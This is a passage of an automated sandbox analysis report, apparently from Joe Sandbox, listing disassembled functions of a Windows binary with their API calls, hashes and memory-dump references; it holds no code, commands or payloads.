                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3210457359-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 271392565e4e44a8290daaa124a1bd868bd004ec9dd9378e4458d3777bb56d8e
                                                                                                                                                                                                                                                                                                    • Instruction ID: a1dcf4a40463ba9bb56b26b78480a7fe4ff67cad6e466318480789b200700617
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 271392565e4e44a8290daaa124a1bd868bd004ec9dd9378e4458d3777bb56d8e
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C51C132640B19BFEF249F25CC4ABDB7BA2EB04354F146212F664BA1E0C771A980DF41
                                                                                                                                                                                                                                                                                                    Function 00E9CB88 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00E9CBC7
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00E9CBDA
                                                                                                                                                                                                                                                                                                    • SetEvent.KERNEL32(?), ref: 00E9CBEE
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E9CC98: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00E9CCB7
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E9CC98: GetLastError.KERNEL32 ref: 00E9CD67
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E9CC98: SetEvent.KERNEL32(?), ref: 00E9CD7B
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E9CC98: InternetCloseHandle.WININET(00000000), ref: 00E9CD86
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 337547030-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 6cec9be1e57902f26d07cd7507a1a997e30582fbc5a6dab794472b31ebca68b1
                                                                                                                                                                                                                                                                                                    • Instruction ID: ba6274b99fc956db44c27265df8c7a90e4d88c6e10ebb1bcc6d39c9797a3adc5
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6cec9be1e57902f26d07cd7507a1a997e30582fbc5a6dab794472b31ebca68b1
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B1316D71504705AFDF21AF61CD44AABBBE8FF08304B24552DF95AA2610DB31E814EB60
                                                                                                                                                                                                                                                                                                    Function 00E82EEF Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E84393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E843AD
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E84393: GetCurrentThreadId.KERNEL32 ref: 00E843B4
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E84393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00E82F00), ref: 00E843BB
                                                                                                                                                                                                                                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00E82F0A
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00E82F28
                                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00E82F2C
                                                                                                                                                                                                                                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00E82F36
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00E82F4E
                                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00E82F52
                                                                                                                                                                                                                                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00E82F5C
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00E82F70
                                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00E82F74
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2014098862-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 4c089e6f7163e161b1ab069cc6048bae65005f3ed5f51edcc38eac56e1ce4700
                                                                                                                                                                                                                                                                                                    • Instruction ID: 5360eb2d1c25f3bf43c45cebcba33871fb5abdcec4761af7c90a9266d3bd4d01
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4c089e6f7163e161b1ab069cc6048bae65005f3ed5f51edcc38eac56e1ce4700
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9F01D8707882107FFB1077699C8AF5A3F99DB4DB11F100015F31CBE1E4C9E15444CAA9
                                                                                                                                                                                                                                                                                                    Function 00E82150 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00E81D95,?,?,00000000), ref: 00E82159
                                                                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,00E81D95,?,?,00000000), ref: 00E82160
                                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00E81D95,?,?,00000000), ref: 00E82175
                                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,00E81D95,?,?,00000000), ref: 00E8217D
                                                                                                                                                                                                                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,00E81D95,?,?,00000000), ref: 00E82180
                                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00E81D95,?,?,00000000), ref: 00E82190
                                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00E81D95,00000000,?,00E81D95,?,?,00000000), ref: 00E82198
                                                                                                                                                                                                                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,00E81D95,?,?,00000000), ref: 00E8219B
                                                                                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,00E821C1,00000000,00000000,00000000), ref: 00E821B5
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1957940570-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: c7da43178d156d34c1c6d0240f360c01b3c10f9e7bd6ab4888e23e07cd5df301
                                                                                                                                                                                                                                                                                                    • Instruction ID: cc701af99071edd4ac7d2fd68cb0339325e179b70720ae7b2b08a5e03ca3603d
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c7da43178d156d34c1c6d0240f360c01b3c10f9e7bd6ab4888e23e07cd5df301
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9101CDB5245304BFE710AFAADC4DF6B7BACEB88711F004511FA05EB1A1DA709804CB30
                                                                                                                                                                                                                                                                                                    Function 00E8CE7B Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 191windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E241EA: _wcslen.LIBCMT ref: 00E241EF
                                                                                                                                                                                                                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E8CF99
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00E8CFE0
                                                                                                                                                                                                                                                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E8D047
                                                                                                                                                                                                                                                                                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00E8D075
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ItemMenu$Info_wcslen$Default
                                                                                                                                                                                                                                                                                                    • String ID: ,*$0$<*
                                                                                                                                                                                                                                                                                                    • API String ID: 1227352736-815946194
                                                                                                                                                                                                                                                                                                    • Opcode ID: 742ec4132002d3e9a7c73412e28e5dcabdebf275f2d42eea27ac474f45cf5e29
                                                                                                                                                                                                                                                                                                    • Instruction ID: 705b5902fbc8548621e9de1c4829093811e38128de059c43d5c51aa807d9c316
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 742ec4132002d3e9a7c73412e28e5dcabdebf275f2d42eea27ac474f45cf5e29
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0E51DF716093009BE714BF24DC45BABB7E9AB85318F042A2DFA9DF32D1DBB0C9058752
                                                                                                                                                                                                                                                                                                    Function 00EAAB3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E8DD87: CreateToolhelp32Snapshot.KERNEL32 ref: 00E8DDAC
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E8DD87: Process32FirstW.KERNEL32(00000000,?), ref: 00E8DDBA
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E8DD87: CloseHandle.KERNEL32(00000000), ref: 00E8DE87
                                                                                                                                                                                                                                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00EAABCA
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00EAABDD
                                                                                                                                                                                                                                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00EAAC10
                                                                                                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 00EAACC5
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 00EAACD0
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00EAAD21
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                                                                                                                                                                                    • String ID: SeDebugPrivilege
                                                                                                                                                                                                                                                                                                    • API String ID: 2533919879-2896544425
                                                                                                                                                                                                                                                                                                    • Opcode ID: ab5f0e089d9a0f769d89017f000ca65da32330c99ce9d97edba634c8b8e23077
                                                                                                                                                                                                                                                                                                    • Instruction ID: 5d52af1cde4a13b9a4fcc55677d968799d9a24fcbb36412d874ed5dde548fb3c
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ab5f0e089d9a0f769d89017f000ca65da32330c99ce9d97edba634c8b8e23077
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B8618D742083429FD310DF15C494F26BBE1AF49318F1894ACE4966F7A2D771EC49CB92
                                                                                                                                                                                                                                                                                                    Function 00EB4322 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00EB43C1
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00EB43D6
                                                                                                                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00EB43F0
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00EB4435
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 00EB4462
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00EB4490
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$Window_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: SysListView32
                                                                                                                                                                                                                                                                                                    • API String ID: 2147712094-78025650
                                                                                                                                                                                                                                                                                                    • Opcode ID: efa9a87164273845b4f0d982d10aa5397db9f7fffbb3b87aba3bea4ae4f0c1c4
                                                                                                                                                                                                                                                                                                    • Instruction ID: d0e3d66170057d89237f97737b306a516558d3be89b5abd69a45028e4faaf031
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: efa9a87164273845b4f0d982d10aa5397db9f7fffbb3b87aba3bea4ae4f0c1c4
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6341CDB1A00318ABDF219F64CC49BEB7BE9EB48354F14112AF958F72D2D7709990CB90
                                                                                                                                                                                                                                                                                                    Function 00E8C625 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E8C6C4
                                                                                                                                                                                                                                                                                                    • IsMenu.USER32(00000000), ref: 00E8C6E4
                                                                                                                                                                                                                                                                                                    • CreatePopupMenu.USER32 ref: 00E8C71A
                                                                                                                                                                                                                                                                                                    • GetMenuItemCount.USER32(011962C0), ref: 00E8C76B
                                                                                                                                                                                                                                                                                                    • InsertMenuItemW.USER32(011962C0,?,00000001,00000030), ref: 00E8C793
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                                                                                                                                                                                                    • String ID: 0$2
                                                                                                                                                                                                                                                                                                    • API String ID: 93392585-3793063076
                                                                                                                                                                                                                                                                                                    • Opcode ID: b98eb7a1ba117665cc14e9a0ed3e6c60c1a1bca07303d69cbc74f4b8e6edf2f1
                                                                                                                                                                                                                                                                                                    • Instruction ID: 6fc25fa62fded6f3323c5c7ef19bad1dad7fc1ad475c3c22d0801aea08a3bdad
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b98eb7a1ba117665cc14e9a0ed3e6c60c1a1bca07303d69cbc74f4b8e6edf2f1
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FD519F706002059BDF10EF78D884AAEBBF4AF46318F34525AE91DB7291E3729945CF71
                                                                                                                                                                                                                                                                                                    Function 00EB86FC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 82COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00EB8740
                                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00EB8765
                                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00EB877D
                                                                                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000004), ref: 00EB87A6
                                                                                                                                                                                                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00E9C1F2,00000000), ref: 00EB87C6
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00E224B0
                                                                                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000004), ref: 00EB87B1
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$Long$MetricsSystem
                                                                                                                                                                                                                                                                                                    • String ID: (
                                                                                                                                                                                                                                                                                                    • API String ID: 2294984445-2063206799
                                                                                                                                                                                                                                                                                                    • Opcode ID: 77d7f8dd70b30bace2a3691564e640714469bacb6f8b82a52f044df7876b9078
                                                                                                                                                                                                                                                                                                    • Instruction ID: 2ab36257cfc532438f6518585546575973f6187a0a2930918c20004bf5c8aaca
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 77d7f8dd70b30bace2a3691564e640714469bacb6f8b82a52f044df7876b9078
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4C21A3716142619FCB145F39CD08AAB37A9EB84328F24572AF922F32F0EF308844CB10
                                                                                                                                                                                                                                                                                                    Function 00E8E73E Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70networkCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                                                                                                                                                                                    • String ID: 0.0.0.0
                                                                                                                                                                                                                                                                                                    • API String ID: 642191829-3771769585
                                                                                                                                                                                                                                                                                                    • Opcode ID: fbd39a0e8ba6503b11977e3993f6a4e3071903d443c907b2ed1a6b32ce6acbc7
                                                                                                                                                                                                                                                                                                    • Instruction ID: e8e15cbf56879f6881aa78c5024ea434fb99b986e365cdeb83c6c15378aed410
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fbd39a0e8ba6503b11977e3993f6a4e3071903d443c907b2ed1a6b32ce6acbc7
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 991124729041147FDB28BB20EC4AFEE77ACDF00314F0011B6F549B2191FE758A818B50
                                                                                                                                                                                                                                                                                                    Function 00E8F630 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _wcslen$LocalTime
                                                                                                                                                                                                                                                                                                    • String ID:
